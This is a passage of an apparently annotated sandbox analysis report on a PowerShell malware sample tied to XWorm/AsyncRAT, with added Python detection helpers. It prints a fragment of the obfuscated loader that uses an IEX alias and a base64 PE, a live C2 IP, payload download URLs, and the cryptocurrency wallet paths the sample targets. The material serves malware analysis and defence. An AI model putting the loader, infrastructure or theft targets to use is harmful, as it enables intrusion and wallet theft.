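    # "Process created" entry, so event order cannot be relied on.
    for writer, target, base, magic in writes:
        if created.get(target) == writer and magic and magic.upper().startswith("4D5A"):
            f.hollowing.append((writer, target, base))   # parent wrote a DOS header into a child it spawned
    return f


def tags(f):
    """Short verdict labels derived from the findings."""
    checks = [("vm-fingerprint-wmi", bool(f.vm_fingerprint_classes)), ("av-discovery", f.av_discovery),
              ("infinite-sleep", f.infinite_sleeps > 0), ("long-sleep", bool(f.long_sleeps_ms)),
              ("sleep-countdown", f.longest_countdown >= 3), ("process-hollowing", bool(f.hollowing))]
    return sorted(t for t, hit in checks if hit)


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
# Constructed lines modelled on this report's entries (not copied from it).
SAMPLE_LINES = [
    f"Source: {RS} | WMI Queries: IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_PhysicalMemory",
    f"Source: {RS} | WMI Queries: IWbemServices::ExecQuery - root\\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')",
    f"Source: {RS} | WMI Queries: IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_DiskDrive",
    f"Source: {RS} | WMI Queries: IWbemServices::CreateInstanceEnum - root\\cimv2 : Win32_Processor",
    f"Source: {RS} | WMI Queries: IWbemServices::ExecQuery - root\\SecurityCenter2 : SELECT * FROM AntiVirusProduct",
    f"Source: {RS} | Thread delayed: delay time: 922337203685477",
    f"Source: {RS} | Thread delayed: delay time: 36000",
    f"Source: {RS} | Thread delayed: delay time: 35890",
    f"Source: {RS} | Thread delayed: delay time: 35781",
    f"Source: {PS} | Memory written: {RS} base: 400000 value starts with: 4D5A",
    f"Source: {PS} | Memory written: {RS} base: 402000",
    f'Source: {PS} | Process created: {RS} "{RS}"',
]
```

On the constructed lines `tags(triage(SAMPLE_LINES))` yields av-discovery, infinite-sleep, process-hollowing, sleep-countdown and vm-fingerprint-wmi. The 36000 to 34672 ms delays in the report are each only about 36 s, so they are not what a three-minute threshold trips; the only delays in this report above that threshold are the two 922337203685477 ms entries. What the shrinking series shows is a loop that re-arms with a slightly shorter delay each pass, which is why the example tracks decreasing runs separately from absolute length.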

      Stealing of Sensitive Information

      Source: RegSvcs.exe, 00000003.00000002.158646258869.00000000031DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Electrum
      Source: RegSvcs.exe, 00000003.00000002.158646258869.00000000031DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $Br4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet@\Br com.liberty.jaxx
      Source: RegSvcs.exe, 00000003.00000002.158646258869.00000000031DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $Br4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
      Source: RegSvcs.exe, 00000003.00000002.158646258869.00000000031DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $Br1C:\Users\user\AppData\Roaming\Ethereum\keystore
      Source: RegSvcs.exe, 00000003.00000002.158646258869.00000000031DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Exodus
      Source: RegSvcs.exe, 00000003.00000002.158646258869.00000000031DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum
      Source: powershell.exe, 00000000.00000002.157432486635.00007FF854090000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: sqlcolumnencryptionkeystoreprovider
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
      Source: Yara match | File source: 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7136, type: MEMORYSTR
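The wallet evidence above is a handful of path fragments (Exodus, Ethereum keystore, the Jaxx identifier) plus a registry key open for Bitcoin-Qt. Because the payload runs inside RegSvcs.exe as .NET code, those strings sit in memory as UTF-16LE, so a dump scan or a Yara rule that only looks for narrow ASCII misses them. The Python below is an added example written for this page, not code from the report or the sample: it scans a memory blob for each indicator in both encodings and reports which wallets a host owner should treat as exposed. The blob is constructed, the product labels are the editor's, the leading characters such as `$Br4` in the report's strings are treated as surrounding memory rather than part of the path (the scan keys on the path suffix so it also matches other usernames), and using the Bitcoin-Qt key path as a string indicator is an assumption, since the report records it as a registry access rather than a string.

```python
import re

# Indicators as they appear in this report's memory strings and registry access; the
# product labels are the editor's, and the Bitcoin-Qt key path is included as a string
# indicator on the assumption that the key name also appears in memory.
WALLET_INDICATORS = {
    "Exodus": [r"\AppData\Roaming\Exodus\exodus.wallet"],
    "Ethereum": [r"\AppData\Roaming\Ethereum\keystore"],
    "Jaxx": ["com.liberty.jaxx"],
    "Electrum": ["Electrum"],                 # short and generic: weak evidence on its own
    "Bitcoin-Qt": [r"Software\Bitcoin\Bitcoin-Qt"],
}


def encodings(s):
    """Both byte forms a .NET process can hold a string in: narrow ASCII and UTF-16LE."""
    return {"ascii": s.encode("ascii"), "utf16le": s.encode("utf-16-le")}


def scan(blob):
    """Return {wallet: [(encoding, offset), ...]} for every indicator found in blob."""
    hits = {}
    for wallet, needles in WALLET_INDICATORS.items():
        for needle in needles:
            for enc, pat in encodings(needle).items():
                for m in re.finditer(re.escape(pat), blob):
                    hits.setdefault(wallet, []).append((enc, m.start()))
    return hits


def exposed_wallets(hits, strong_only=True):
    """Wallets to treat as compromised; the bare 'Electrum' string is dropped when strong_only."""
    return sorted(w for w in hits if not (strong_only and w == "Electrum"))


def build_sample_dump():
    """Constructed stand-in for a slice of RegSvcs.exe memory; not real dump data."""
    return b"".join([
        b"\x00" * 16,
        "C:\\Users\\alice\\AppData\\Roaming\\Exodus\\exodus.wallet".encode("utf-16-le"),
        b"\x00" * 8,
        b"Software\\Bitcoin\\Bitcoin-Qt\x00",
        "com.liberty.jaxx".encode("utf-16-le"),
        b"Electrum",
        "C:\\Users\\alice\\AppData\\Roaming\\Ethereum\\keystore".encode("utf-16-le"),
    ])
```

The same two-encoding search is what the `ascii wide` modifier does on a Yara string, and it is the first thing to check when a rule written from a .NET sample's decompiled strings fails to fire on a memory dump of the hollowed host process.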
      MITRE ATT&CK matrix, listed per tactic (the bracketed numbers are the badges the report shows next to the techniques it matched; entries without a badge are the matrix's unmatched placeholder cells):
      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
      Execution: Windows Management Instrumentation [321]; PowerShell [1]; At; Cron; Launchd; Scheduled Task
      Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
      Privilege Escalation: Process Injection [212]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
      Defense Evasion: Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [321]; Process Injection [212]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; DLL Side-Loading [1]
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
      Discovery: Security Software Discovery [421]; Process Discovery [2]; Virtualization/Sandbox Evasion [321]; Application Window Discovery [1]; File and Directory Discovery [2]; System Information Discovery [213]
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
      Collection: Archive Collected Data [1]; Data from Local System [1]; Clipboard Data [1]; Input Capture; Keylogging; GUI Input Capture
      Command and Control: Encrypted Channel [1]; Non-Standard Port [1]; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
      Source | Detection | Scanner | Label | Link
      92.255.57.112.ps1 | 3% | ReversingLabs | |
      92.255.57.112.ps1 | 7% | Virustotal | | Browse
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label | Link
      http://crl.microsoft.c | 0% | Avira URL Cloud | safe |
      No contacted domains info
      Name | Source | Malicious | Antivirus Detection | Reputation
      http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.157400544873.00000228C8389000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmp | false | | high
      http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://stackoverflow.com/q/14436606/23354 | RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp | false | | high
      http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll | RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp | false | | high
      http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://go.micro | powershell.exe, 00000000.00000002.157400544873.00000228C7995000.00000004.00000800.00020000.00000000.sdmp | false | | high
      http://pesterbdd.com/images/Pester.pngh | powershell.exe, 00000000.00000002.157400544873.00000228C82FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe | RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://contoso.com/License | powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://contoso.com/Icon | powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmp | false | | high
      http://www.apache.org/licenses/LICENSE-2.0.htmlXz | powershell.exe, 00000000.00000002.157400544873.00000228C69EA000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://stackoverflow.com/q/2152978/23354rCannot | RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://stackoverflow.com/q/11564914/23354; | RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe | RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://contoso.com/ | powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://github.com/Pester/Pesterh | powershell.exe, 00000000.00000002.157400544873.00000228C82FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.157400544873.00000228C8389000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmp | false | | high
      http://www.apache.org/licenses/LICENSE-2.0.htmlh | powershell.exe, 00000000.00000002.157400544873.00000228C82FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp | false | |
                                              high
                                              http://crl.microsoft.cpowershell.exe, 00000000.00000002.157428012843.00000228DEB69000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.quovadis.bm0powershell.exe, 00000000.00000002.157425977056.00000228DE809000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158659913355.0000000005780000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/Pester/PesterXzpowershell.exe, 00000000.00000002.157400544873.00000228C69EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://aka.ms/pscore68powershell.exe, 00000000.00000002.157400544873.00000228C67C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.157425977056.00000228DE809000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158659913355.0000000005780000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.157400544873.00000228C67C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.000000000339D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://oneget.orgpowershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000000.00000002.157400544873.00000228C69EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
92.255.57.112 | unknown | Russian Federation | 42253 | TELSPRU | true
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1591628
                                                            Start date and time:2025-01-15 08:30:58 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 41s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                                                            Run name:Suspected VM Detection
                                                            Number of analysed new started processes analysed:4
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:92.255.57.112.ps1
                                                            Detection:MAL
                                                            Classification:mal88.spyw.evad.winPS1@4/5@0/1
                                                            EGA Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 79%
                                                            • Number of executed functions: 67
                                                            • Number of non-executed functions: 2
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .ps1
                                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                                            • Execution Graph export aborted for target RegSvcs.exe, PID 7136 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 6176 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
02:33:03 | API Interceptor | 5x Sleep call for process: powershell.exe modified
02:33:10 | API Interceptor | 3652825x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
92.255.57.112 | 92.255.57_1.112.ps1 | malicious | XWorm |
92.255.57.112 | book_lumm2.dat.exe | malicious | XWorm |
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELSPRU | WZ6RvDzQeq.exe | malicious | Unknown | 92.255.57.155
TELSPRU | WZ6RvDzQeq.exe | malicious | Unknown | 92.255.57.155
TELSPRU | 2.ps1 | malicious | Unknown | 92.255.57.155
TELSPRU | 2.ps1 | malicious | Unknown | 92.255.57.155
TELSPRU | 92.255.57_1.112.ps1 | malicious | XWorm | 92.255.57.112
TELSPRU | book_lumm2.dat.exe | malicious | XWorm | 92.255.57.112
TELSPRU | http://92.255.57.155/1/1.png | malicious | Unknown | 92.255.57.155
TELSPRU | 92.255.57.155.ps1 | malicious | XWorm | 92.255.57.155
TELSPRU | png2obj1_XClient.exe | malicious | XWorm | 92.255.57.155
No context
No context
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:@...e...........................................................
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7464161430826683
                                                                Encrypted:false
                                                                SSDEEP:96:6P1KZCvG2Y+kvhkvCCtlG+crIEH3D+crI9H38:6P1w09cEtcEq
                                                                MD5:8F502D164F0FDE13A77B53281D38001E
                                                                SHA1:ECDCC194A481A1723CD8AF84FDA66AB829A21CE0
                                                                SHA-256:6EED7C395A0B162F61F50F9E75B87AA14800F332D2809E51AE0BEC34DF1636A3
                                                                SHA-512:1E245C8E1C36369F6C57E9DA5A71525A7CB71EC73CFE38AE4F40DCE7F47B3D2C45720763B0DBE61C2DD0F9BFD3070C87C8F13CBA14701032DBC2D206E46BDF1D
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...;.}.S...s...g..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S.....F..g......g......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S./Z.<....B......................A!.A.p.p.D.a.t.a...B.V.1...../Z.<..Roaming.@......"S./Z.<....D......................H/.R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S./Z.<....E.......................(.M.i.c.r.o.s.o.f.t.....V.1...../Z....Windows.@......"S./Z.<....F......................`..W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`/Z......H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`/Z......I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S..Ze.....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S./Z"<....i...........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7464161430826683
                                                                Encrypted:false
                                                                SSDEEP:96:6P1KZCvG2Y+kvhkvCCtlG+crIEH3D+crI9H38:6P1w09cEtcEq
                                                                MD5:8F502D164F0FDE13A77B53281D38001E
                                                                SHA1:ECDCC194A481A1723CD8AF84FDA66AB829A21CE0
                                                                SHA-256:6EED7C395A0B162F61F50F9E75B87AA14800F332D2809E51AE0BEC34DF1636A3
                                                                SHA-512:1E245C8E1C36369F6C57E9DA5A71525A7CB71EC73CFE38AE4F40DCE7F47B3D2C45720763B0DBE61C2DD0F9BFD3070C87C8F13CBA14701032DBC2D206E46BDF1D
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...;.}.S...s...g..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S.....F..g......g......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S./Z.<....B......................A!.A.p.p.D.a.t.a...B.V.1...../Z.<..Roaming.@......"S./Z.<....D......................H/.R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S./Z.<....E.......................(.M.i.c.r.o.s.o.f.t.....V.1...../Z....Windows.@......"S./Z.<....F......................`..W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`/Z......H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`/Z......I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S..Ze.....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S./Z"<....i...........
                                                                File type:ASCII text, with very long lines (65478), with CRLF line terminators
                                                                Entropy (8bit):5.908191267301583
                                                                TrID:
                                                                  File name:92.255.57.112.ps1
                                                                  File size:526'214 bytes
                                                                  MD5:7b7bab781f4b30aee1289f36a01606a0
                                                                  SHA1:1b7a8d8302afa6f27f27d3d313865c2a4af61bdd
                                                                  SHA256:e82de6b368baabcc81ce3316a319f27173e82b9c2e94a043bf42b62458dc5a98
                                                                  SHA512:6bdbed54c70d1fbba9e5d3ef620a89c3a9a285177d2a646ecf478808d6b15372e6e3ca1b59c76a36f7a8a2a63c245b4eb6ab4a5a879ecc06446ae123ab62a927
                                                                  SSDEEP:12288:eFwowo0VN2VOhllXKS2Utye+jF2RZQcqNStpIOe0Ti0dBmEv7:2S37hloSTtKF2RZQHGuvo
                                                                  TLSH:D3B401731617FC8F67AF1F89E9003B952C7C943B6B1C4058F9C90BA990EA520DE6AD74
                                                                  File Content Preview:.. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKcOfWcAAAAAAA
                                                                  Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-15T08:33:11.565512+0100 | 2035595 | ET MALWARE Generic AsyncRAT Style SSL Cert | 1 | 92.255.57.112 | 56001 | 192.168.11.20 | 49780 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 15, 2025 08:33:10.632803917 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:33:10.857168913 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:33:10.857480049 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:33:10.862202883 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:33:11.086667061 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:33:11.086824894 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:33:11.334029913 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:33:11.334068060 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:33:11.334259033 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:33:11.336519957 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:33:11.565511942 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:33:11.607212067 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:33:13.122584105 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:33:13.400027990 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:33:13.400243998 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:33:13.665625095 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:33:47.600058079 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:33:47.877891064 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:33:47.878153086 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:33:48.103578091 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:33:48.145963907 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:33:48.370412111 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:33:48.374840975 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:33:48.643074989 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:33:48.643291950 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:33:48.909614086 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:34:23.610824108 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:34:23.877226114 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:34:23.877374887 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:34:24.102623940 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:34:24.153666019 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:34:24.378115892 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:34:24.380059958 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:34:24.658353090 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:34:24.658639908 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:34:24.924118996 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:34:59.621026039 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:34:59.888185024 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:34:59.888303041 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:35:00.113588095 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:35:00.161370993 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
